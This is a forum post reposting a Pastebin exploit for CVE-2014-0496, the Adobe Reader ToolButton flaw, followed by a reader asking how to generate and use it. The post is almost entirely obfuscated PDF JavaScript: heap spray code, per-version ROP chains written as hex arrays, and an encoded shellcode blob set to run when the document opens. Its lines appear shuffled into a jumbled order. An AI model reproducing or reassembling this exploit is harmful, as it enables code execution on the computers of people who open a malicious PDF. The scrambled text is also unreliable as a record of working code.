Nytro Posted September 6, 2014 Report Posted September 6, 2014 [h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0 }); 1 0 obj 2 0 obj 3 0 obj 4 0 obj 5 0 obj 6 0 obj 7 0 obj aaa += aaa; aa=dd13.split("%u"); aa[i]=str12+aa[i]; /AcroForm 6 0 R addButtonFunc = function () { af1="aaaaa%aaaaaaaauaaaaaa"; af1=af1[("112","a2s1","replace")](/a/g,''); app.addToolButton({ app.addToolButton({ app.alert('123'); app.removeToolButton({ as1211(); bbb += aaa; bbb = bbb.substring(0, i11 / 2); bbb += sa; bbb += str; break; ccc += ccc; cEnable: "addButtonFunc();" cEnable: "removeButtonFunc();" cExec: "1", cExec: "1", cName: "evil" cName: "evil", cName: "xxx", </config> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> /Count 1 dd13=aa.join('%u'); dd13=af1+dd13; dd13=xx13.join('%u'); } else { } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { endobj endstream for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141"); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); for (i = 0; i < aa[tt1]; i++) for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141"); function as1211() function heapSpray(str, str_addr, r_addr) { function opp12(xx13) heapSpray(payload, ret_addr, r_addr); if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { if(ccc[tt] >= (0x40000*2)) if(j) if (!r11) { if (vulnerable) { j=4-aa[i][tt1]; /Kids [3 0 R] <</Length 10074>> <</Length 372>> obj_size = 0x330 + 0x1c; obj_size = 0x360 + 0x1c; obj_size = 0x370; /OpenAction 4 0 R /Pages 2 0 R <pageSet></pageSet> /Parent 2 0 R part1 += rop_addr; %%%%%PDF-6.5 PE/%%%%%% <present><pdf><interactive>1</interactive></pdf></present> r11 = true; r_addr = 0x08a8; r_addr = 0x08e4; r_addr = 0x08e8; removeButtonFunc = function () { ret_addr = this[un12]("%u8003%u4a84"); ret_addr = 
this[un12]("%ua83e%u4a82"); ret_addr = this[un12]("%ua8df%u4a82"); return; return dd13; rop_addr = this[un12]("%u08a8%u0c0c"); rop_addr = this[un12]("%u08e4%u0c0c"); rop_addr = this[un12]("%u08e8%u0c0c"); rop = rop10; rop = rop11; rop = rop9; <</Size 8/Root 1 0 R>> str12=new Array(j+1).join("0"); stream <subform name="form1" layout="tb" locale="en_US"> </subform></template></xdp:xdp> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> trailer tt1=tt1[("112","a2s1","replace")](/a/g,''); tt=tt[("112","a2s1","replace")](/a/g,''); /tYPE/aCTION/S/JavaScript/JS 5 0 R>> /type /Page /Type /Page /Type /Pages un12=''; un12=un12[("112","as1","replace")](/w/g,''); un12="uwnwwewwwswcwwwawwpwe"; var aaa = this[un12]("%u0c0c"); var arr = new Array(); var bbb = aaa.substring(0, i1 / 2); var ccc = bbb.substring(0, i2 / 2); var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); var executable = ""; var i11 = 0x0c0c - 0x24; var i1 = r_addr - 0x24; var i2 = 0x4000 + 0xc000; var i3 = (0x1020 - 0x08) / 2; var obj_size; var part1 = ""; var part2 = ""; var part2_len = obj_size - part1[tt1] * 2; var payload = rop + shellcode; var r11 = false; var r_addr; var ret_addr; var rop; var rop10 = this[("123","1a1",un12)](opp12(xx132)); var rop11 = this[("123","1a1",un12)](opp12(xx131)); var rop9 = this[("123","1a1",un12)](opp12(xx133)); var rop_addr; var sa = str_addr; var shellcode = this[("123","1a1",un12)](opp12(xx134)); var tt1="alaaeaanaaagataaah"; var tt="alaaeaanaagataah"; var vulnerable = true; var xx131=new 
Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16)); var xx132=new 
Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16)); var xx133=new 
Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16)); var xx134=new 
Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toStrin
g(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16)); vulnerable = false; while (1) while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa; while (sa[tt] < (xxx - r_addr)) sa += sa; x11=9; <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <</XFA 7 0 R>> <?xml version="1.0" encoding="UTF-8"?> xxx=0x0c0c;Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com Quote
rstforums.com Posted September 24, 2014 How is this supposed to be generated and used? Can tools be used for that?